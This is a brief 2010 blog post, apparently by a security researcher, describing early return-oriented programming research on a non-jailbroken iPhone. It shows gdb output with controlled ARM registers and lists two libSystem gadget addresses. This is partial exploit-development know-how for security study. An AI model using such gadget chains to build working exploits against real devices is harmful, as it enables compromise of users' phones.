| 01 |
02 |
03 |
04 |
05 |
06 |
07 |
08 |
09 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
27-May-2010 [11:39] -- Learning ROP on iPhone (ARM)
Some little research on iphone (non jailbroken) security and ROP (return oriented programming) this weekend... did not go so far but promises a lot...
Right now controlling most of interesting registers, including pc, with just two chained ARM gadgets:
(gdb) info reg r0 r1 r2 r3 r4 r5 r6 r7 pc
r0 0x10 16
r1 0x11111111 286331153
r2 0x22222222 572662306
r3 0x33333333 858993459
r4 0x44444444 1145324612
r5 0x55555555 1431655765
r6 0x66666666 1717986918
r7 0x77777777 2004318071
pc 0xdeadbeee -559038738
(gdb)
Gadgets are: (first one borrowed from zynamics
blogpost. Thx guys :)
x32988d5e - libSystem+000c7d5e - pop {r0, r1, r2, r3, pc}
0x3298cdf6 - libSystem+000cbdf6 - pop {r4, r5, r6, r7, pc}
Now onto some more interesting gadgets to call functions and chain them...
Fermin J. Serna - @fjserna
Comments (0)
